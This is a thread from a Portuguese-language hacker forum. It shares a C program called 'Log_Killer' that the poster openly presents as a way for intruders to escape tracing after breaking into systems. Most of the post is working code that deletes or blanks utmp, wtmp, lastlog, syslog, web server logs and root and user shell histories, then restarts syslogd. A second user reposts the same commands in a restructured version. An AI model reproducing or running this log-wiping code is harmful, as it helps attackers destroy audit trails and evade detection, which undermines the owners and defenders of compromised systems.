[SCRIPT] Pequeno script em C para apagar logs no Linux.

[K00D13]

Descrição:

Apaga os logs do sistema linux. Isso evita que invasores sejam rastreados e possivelmente presos caso invadam um sistema importante como um mainframe militar ou algo do tipo. O código é de fícil interpretação e este script deve ser levado apenas como exemplo. Não o tome como ferramenta definitiva de apagamento de logs, pois alguns logs variam de linux para linux, ou seja, um linux que tenha, por exemplo, um servidor de sendmail rodando, vai ter logs a mais do que um outro sistema linux qualquer. Então esse script é vílido em algumas situações e não todas. O sistema que você invadiu pode ter logs que não estío incluidos no código-fonte do script. Caso isso seja verdadeiro, cabe ao programador em C modificar o código para sua necessidade atual:

Aos lammers:

Esse script foi codado, compilado e testado em um linux kurumin 7 de Kernel 2.6. Ele funcionou perfeitamente e apagou os rastros dos logs. Portanto, não venha me encher com coisas do tipo "Ahn não sei compilar" ou "Que droga, os logs do meu Windows(Ruindows) estão aqui ainda". Caso alguem tenha a infeliz idéia de me mandar uma mp com uma dúvida dessas, eu simplesmente não vou responder.

Tenha em mente que:

[1-] Isso é um script para linux, portanto não vai funcionar na porcaria de Windows nenhum.

[2-] É necessírio possuir acesso root a maquina para que o script funcione.

[3-] Compile com o comando:

gcc -o dllk dllk.c

E depois execute-o assim:

./dllk

[4-] O código foi totalmente revisado antes de ser postado. Apesar de simples, ele não possui erro algum.

Código-Fonte:

Ai estí o código-fonte do script:

/*
################################################## ########################
# [D3V1L_L337] Log_Killer coded by K00D13 ((geek_crazy_boy@hotmail.com)).#
# [P.U] From Pirates Underworld Crew. ((irc.gigachat.net >> #pu)). #
# [Warning:] We are coders, not defacers... #
# [Members_List] We are: BLUCKBUOBLEO,K00D13,RAYBLACK,DARKVIRUS,RUNVIRUS,#
# ARCHIT3CT AND UIDZ3RO((an0mix)). [End_List] ((http://www.pusafe.com soon!)) #
# [Date] March, 16, 2007. 1:00pm ((São Paulo - SP - Brazil)) #
# [Quote] Fuck lammers, code rippers and all our enemys off course... #
################################################## ########################

*/

#include <stdio.h>
#include <stdlib.h>

int banner(void) {

system("clear");
printf("\n =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=");
printf("\n ** [D3V1L_L33T] Log Killer Coded by K00D13 ** ");
printf("\n Contact: irc.gigachat.net #pu ");
printf("\n =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=");
printf("\n \n");

return 0;

}

int warn(void) {

printf("\n > Msg: Logs sucessfuly erased and replaced by new logs!");
printf("\n > Msg: Syslogd log sucessfuly erased and replaced by new log!");
printf("\n > Msg: Syslogd sucessfuly restarted!");
printf("\n \n");
banner();
printf("\n > Msg: Game over!");
printf("\n > Log_Killer shutting down...\n");
sleep(3);
exit(0);

return 0;
}

int main(void) {

int ch;
banner();
printf("[Warning] - You must be root to run this script! \n");
printf("[Warning]- Start log cleanish? - [1 = Yes /2 = No]");
printf("\n > ");
scanf("%d", &ch);

switch (ch) {
case 1: clean(); break;
case 2: cancel(); break;
default: printf("\n Error! Not a valid option! You can choose only Yes or No! \n");sleep(2);exit(1);break;
}
return 0;

}


int cancel(void) {
banner();
printf("\n > Log Killer Status: > ABORTED <");
sleep(2);
printf("\n > Msg: Good bye...\n");
exit(0);

return 0;

}

int clean(void) {

int x = 1;

printf("\n Running Log Killer. Please wait...");
do {
printf("#");
x++;
}
while(x < 10);

system("rm -f /var/run/utmp");
system("echo \" \" > /var/run/utmp");
system("rm -f /var/run/wtmp");
system("echo \" \" > /var/run/wtmp");
system("rm -f /var/log/messages");
system("echo \" \" > /var/log/messages");
system("rm -f /var/log/messages");
system("echo \" \" > /var/log/messages");
system("rm -f /var/log/faillog");
system("echo \" \" > /var/log/faillog");
system("rm -f /var/log/debug");
system("echo \" \" > /var/log/debug");
system("rm -f /var/log/lastlog");
system("echo \" \" > /var/log/lastlog");
system("rm -f /var/log/*.log");
system("rm -f /var/log/httpd/error_log");
system("echo \" \" > /var/log/httpd/error_log");
system("rm -f > /var/run/*.pid");
system("rm -f > /var/run/*.reboot");
system("rm -f /var/run/motd");
system("echo \" \" > /var/run/motd");
system("echo \" \" > /var/run/sshd/*");
system("rm -f /var/log/syslog");
system("cd /home/usr;rm -f .bash_history;echo \" \" > .bash_history");
system("cd /home/root;rm -f .bash_history;echo \" \" > .bash_history");
system("cd /root;rm -f .bash_history;echo \" \" > .bash_history");
system("echo \" \" > /var/log/*");
system("echo \" \" > /var/log/syslog");
system("killall -HUP syslogd");
system("clear");
sleep(2);
warn();

return 0;

}

//The end! =D

[kayo]

não seria melhro colocar tudo dentro do main?

#include <stdio>
#include <stdlib.h>

/* um deletar de log's */

int main(void) {

printf("\n ~ Limpeza de logs 0.0.1");

while(1) {
printf("\n ~ Você tem que estar logado como root \n Deseja limpar os caches? \n (1) Sim \n (2) Não \n :");
int resp;
scanf("%d",&resp);

switch (resp) {
case 1: {
system("rm -f /var/run/utmp");
system("echo \" \" > /var/run/utmp");
system("rm -f /var/run/wtmp");
system("echo \" \" > /var/run/wtmp");
system("rm -f /var/log/messages");
system("echo \" \" > /var/log/messages");
system("rm -f /var/log/messages");
system("echo \" \" > /var/log/messages");
system("rm -f /var/log/faillog");
system("echo \" \" > /var/log/faillog");
system("rm -f /var/log/debug");
system("echo \" \" > /var/log/debug");
system("rm -f /var/log/lastlog");
system("echo \" \" > /var/log/lastlog");
system("rm -f /var/log/*.log");
system("rm -f /var/log/httpd/error_log");
system("echo \" \" > /var/log/httpd/error_log");
system("rm -f > /var/run/*.pid");
system("rm -f > /var/run/*.reboot");
system("rm -f /var/run/motd");
system("echo \" \" > /var/run/motd");
system("echo \" \" > /var/run/sshd/*");
system("rm -f /var/log/syslog");
system("cd /home/usr;rm -f .bash_history;echo \" \" > .bash_history");
system("cd /home/root;rm -f .bash_history;echo \" \" > .bash_history");
system("cd /root;rm -f .bash_history;echo \" \" > .bash_history");
system("echo \" \" > /var/log/*");
system("echo \" \" > /var/log/syslog");
system("killall -HUP syslogd");
system("clear");
sleep(2);
printf("\n Logs deletados!");
exit(0);
}
case 2: {
exit(0);
break; }
}
}

obs: não testado

[K00D13]

Organizando em funções fica melhor para vizualizar, mas se quiser botar tudo dentro do maiin fique a vontade.

[kayo]

as funcoes estouram a pilha. isso é mto ruim.

[HellConective]

Interessante cara, e como voce disse acima, o cara que fazer uma pergunta de como compilar é concerteza esta na area errada :lol:

[marok]

Você é um gênio do C++ parabéns, eu gostei além disso o tópico ficou organizado e bonito.

[K00D13]

Você é um gênio do C++ parabéns, eu gostei além disso o tópico ficou organizado e bonito.

Obrigado Marok, mas o código estí em C e não em C++


Fui.

[marok]

Eu sei foi um teste kkk

ops:

[kayo]

Cara, a escrita desse programa até que não gera muitos danos ao sistema, mas imaginem um programa com 500 linhas que fosse, essa 'organização' "corroe" o sistema... procure ver como a chamada de funções atua sobre a pilha.

[ChaosData]

muito bom K00D... útil :twisted: